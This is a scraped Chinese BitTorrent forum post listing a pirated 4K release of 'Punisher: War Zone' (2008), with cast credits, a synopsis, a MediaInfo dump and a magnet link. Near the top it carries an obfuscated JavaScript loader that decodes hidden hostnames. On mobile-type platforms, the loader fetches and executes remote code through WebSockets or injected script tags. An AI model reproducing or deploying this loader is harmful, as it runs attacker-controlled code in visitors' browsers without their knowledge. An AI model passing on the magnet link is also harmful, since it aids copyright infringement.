惩罚者2:战争特区[中文字幕].Punisher.War.Zone.2008.2160p.4K迅雷下载 16.33GB

版主小s 2月前 403

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 惩罚者2:战争特区 / 神鬼制裁2:就地正法 / 惩罚者2 战区 / 制裁者2:战争地带

◎片 名 Punisher: War Zone

◎年 代 2008

◎产 地 美国 / 加拿大 / 德国

◎类 别 剧情 / 动作 / 惊悚 / 犯罪

◎语 言 英语

◎上映日期 2008-12-05

◎IMDb链接 https://www.imdb.com/title/tt0450314/

◎豆瓣评分 6.6/10 (12665人评价)

◎豆瓣链接 https://movie.douban.com/subject/1871800/

◎片 长 103 分钟

◎导 演 莱克茜·亚历山大 Lexi Alexander (id:1292184)

◎编 剧 尼克·桑多拉 Nick Santora (id:1388843)

阿特·马库姆 Art Marcum (id:1306770)

马特·霍洛维 Matt Holloway (id:1286819)

◎演 员 雷·史蒂文森 Ray Stevenson (id:1019007)

多米尼克·韦斯特 Dominic West (id:1027173)

道格·休切逊 Doug Hutchison (id:1018015)

科林·萨蒙 Colin Salmon (id:1314721)

韦恩·奈特 Wayne Knight (id:1025209)

达什·米霍克 Dash Mihok (id:1018075)

朱莉·本茨 Julie Benz (id:1044710)

丝黛芬妮·珍妮斯卡斯 Stephanie Janusauskas (id:1401523)

马克·卡马乔 Mark Camacho (id:1078528)

罗曼诺·欧萨里 Romano Orzari (id:1135882)

克拉姆·马立基·桑切斯 Keram Malicki-Sánchez (id:1125975)

拉里·戴 Larry Day (id:1037110)

罗恩·利 Ron Lea (id:1369996)

托尼·卡拉布雷塔 Tony Calabretta (id:1076114)

T.J. Storm T.J. Storm (id:1323540)

大卫·瓦迪姆 David Vadim (id:1154955)

奥伯特·帕拉斯西奥 Aubert Pallascio (id:1025626)

简卡·摩吉尔 Bjanka Murgel (id:1319133)

卡斯·安瓦尔 Cas Anvar (id:1323602)

Jon Barton Jon Barton (id:1177779)

盖尔·安妮·赫德 Gale Anne Hurd (id:1040812)

斯坦·李 Stan Lee (id:1013888)

麦克尔·旺德迈彻 Michael Wandmacher (id:1041894)

史蒂夫·盖纳 Steve Gainer (id:1042000)

Jennifer L. Smith Jennifer L. Smith (id:1198453)

玛丽·特里西亚·伍德 Mary Tricia Wood (id:1165846)

Andrew Neskoromny Andrew Neskoromny (id:1293058)

Martin Gendron Martin Gendron (id:1284704)

Jean Kazemirchuk Jean Kazemirchuk (id:1051540)

艾德里安·莫罗特 Adrien Morot (id:1292524)

Melissa Purino Melissa Purino (id:1294986)

Jessica Rain Jessica Rain (id:1295144)

Doug Coleman Doug Coleman (id:1281036)

John McKeown John McKeown (id:1120716)

Efram Potelle Efram Potelle (id:1276399)

David Ridlen David Ridlen (id:1048719)

雷·麦金太尔 Ray McIntyre Jr. (id:1291625)

亚当·霍华德 Adam Howard (id:1042283)

Sarah Coatts Sarah Coatts (id:1163314)

罗伯特·肖特 Robert Short (id:1297515)

Chris Ervin Chris Ervin (id:1034362)

Nick Drew Nick Drew (id:1282721)

◎标 签 动作 / 暴力 / 美国 / 犯罪 / 漫画改编 / 血腥 / 美国电影 / 惩罚者2

◎简 介

前FBI探员弗兰克卡(雷·史蒂文森RayStevenson饰)在黑帮杀掉妻儿之后走向了黑暗复仇的不归路。成为这个城市里隐秘的“惩罚者”,令城内不少罪犯闻风丧胆,而他穿着代表惩罚者的骷髅制服,穿梭在这个充满罪恶的都市中。一名新崛起的黑帮份子比利(多米尼克·威斯特DominicWest饰)开始向惩罚者叫嚣,并且还要统领城内各大帮派。可一番激斗之后,比利最终还是败在惩罚者的枪下。不过若干时日之后,一位名叫疯人吉姆(道格·休切逊DougHutchison饰)的神秘人现身城内,他不但有着和比利一样信念,而且他的手法更离谱——他不但要统一黑帮,还要干掉其他帮派的黑帮头目,做城内真正的寡头老大,甚至他还向惩罚者下了挑战书,要将他置于死地!惩罚者在追查的过程中,渐渐发现了吉姆的真实身份,这令他大吃一惊……

  1. General

  2. Unique ID : 300718984342425479320532324720050469613 (0xE23C5EA349C3D8A3CBDF796037247AED)

  3. Complete name : Punisher.War.Zone.2008.2160p.HDR.UHD.BluRay.TrueHD.7.1.Atmos.x265-10bit-HDS.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 16.3 GiB

  7. Duration : 1 h 42 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 22.8 Mb/s

  10. Movie name : Punisher War Zone 2008 2160p HDR UHD BluRay TrueHD 7.1 Atmos x265-10bit-HDS

  11. Encoded date : UTC 2021-06-29 02:11:01

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. HDR format : SMPTE ST 2086, HDR10 compatible

  20. Codec ID : V_MPEGH/ISO/HEVC

  21. Duration : 1 h 42 min

  22. Bit rate : 17.4 Mb/s

  23. Width : 3 840 pixels

  24. Height : 2 160 pixels

  25. Display aspect ratio : 16:9

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 10 bits

  31. Bits/(Pixel*Frame) : 0.088

  32. Stream size : 12.5 GiB (77%)

  33. Title : [email protected]

  34. Writing library : x265 - H.265/HEVC codec

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.2020

  39. Transfer characteristics : PQ

  40. Matrix coefficients : BT.2020 non-constant

  41. Mastering display color primaries : Display P3

  42. Mastering display luminance : min: 0.0020 cd/m2, max: 1000 cd/m2

  43. Maximum Content Light Level : 739 cd/m2

  44. Maximum Frame-Average Light Level : 331 cd/m2


  45. Audio

  46. ID : 2

  47. Format : MLP FBA 16-ch

  48. Format/Info : Meridian Lossless Packing FBA with 16-channel presentation

  49. Commercial name : Dolby TrueHD with Dolby Atmos

  50. Codec ID : A_TRUEHD

  51. Duration : 1 h 42 min

  52. Bit rate mode : Variable

  53. Bit rate : 5 207 kb/s

  54. Maximum bit rate : 8 988 kb/s

  55. Channel(s) : 8 channels

  56. Channel layout : L R C LFE Ls Rs Lb Rb

  57. Sampling rate : 48.0 kHz

  58. Frame rate : 1 200.000 FPS (40 SPF)

  59. Compression mode : Lossless

  60. Stream size : 3.74 GiB (23%)

  61. Title : English

  62. Language : English

  63. Default : Yes

  64. Forced : No

  65. Number of dynamic objects : 15

  66. Bed channel count : 1 channel

  67. Bed channel configuration : LFE


  68. Text #1

  69. ID : 3

  70. Format : PGS

  71. Muxing mode : zlib

  72. Codec ID : S_HDMV/PGS

  73. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  74. Duration : 1 h 34 min

  75. Bit rate : 18.8 kb/s

  76. Count of elements : 1527

  77. Stream size : 12.7 MiB (0%)

  78. Title : CHS

  79. Language : Chinese

  80. Default : Yes

  81. Forced : No


  82. Text #2

  83. ID : 4

  84. Format : PGS

  85. Muxing mode : zlib

  86. Codec ID : S_HDMV/PGS

  87. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  88. Duration : 1 h 34 min

  89. Bit rate : 19.2 kb/s

  90. Count of elements : 1527

  91. Stream size : 13.0 MiB (0%)

  92. Title : CHT

  93. Language : Chinese

  94. Default : No

  95. Forced : No


  96. Text #3

  97. ID : 5

  98. Format : PGS

  99. Muxing mode : zlib

  100. Codec ID : S_HDMV/PGS

  101. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  102. Duration : 1 h 34 min

  103. Bit rate : 33.3 kb/s

  104. Count of elements : 1527

  105. Stream size : 22.6 MiB (0%)

  106. Title : CHS&ENG

  107. Language : Chinese

  108. Default : No

  109. Forced : No


  110. Text #4

  111. ID : 6

  112. Format : PGS

  113. Muxing mode : zlib

  114. Codec ID : S_HDMV/PGS

  115. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  116. Duration : 1 h 34 min

  117. Bit rate : 33.7 kb/s

  118. Count of elements : 1527

  119. Stream size : 22.8 MiB (0%)

  120. Title : CHT&ENG

  121. Language : Chinese

  122. Default : No

  123. Forced : No


  124. Menu

  125. 00:00:00.000 : en:Chapter 01

  126. 00:06:41.818 : en:Chapter 02

  127. 00:06:41.901 : en:Chapter 03

  128. 00:16:03.129 : en:Chapter 04

  129. 00:16:03.212 : en:Chapter 05

  130. 00:21:24.158 : en:Chapter 06

  131. 00:21:24.241 : en:Chapter 07

  132. 00:25:32.906 : en:Chapter 08

  133. 00:25:32.990 : en:Chapter 09

  134. 00:30:41.840 : en:Chapter 10

  135. 00:30:41.923 : en:Chapter 11

  136. 00:35:34.424 : en:Chapter 12

  137. 00:35:34.507 : en:Chapter 13

  138. 00:44:06.185 : en:Chapter 14

  139. 00:44:06.269 : en:Chapter 15

  140. 00:52:03.370 : en:Chapter 16

  141. 00:52:03.454 : en:Chapter 17

  142. 00:57:41.208 : en:Chapter 18

  143. 00:57:41.291 : en:Chapter 19

  144. 01:05:13.535 : en:Chapter 20

  145. 01:05:13.618 : en:Chapter 21

  146. 01:12:28.344 : en:Chapter 22

  147. 01:12:28.427 : en:Chapter 23

  148. 01:20:21.859 : en:Chapter 24

  149. 01:20:21.942 : en:Chapter 25

  150. 01:26:36.441 : en:Chapter 26

  151. 01:26:36.525 : en:Chapter 27

  152. 01:28:33.642 : en:Chapter 28

  153. 01:28:33.725 : en:Chapter 29

  154. 01:32:44.934 : en:Chapter 30

  155. 01:32:45.018 : en:Chapter 31


TAGS 动作 剧情 惊悚 犯罪

磁力链:
  • magnet:?xt=urn:btih:771ADFA8D9577AB4434AA7A85B20659874DBD0A5
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回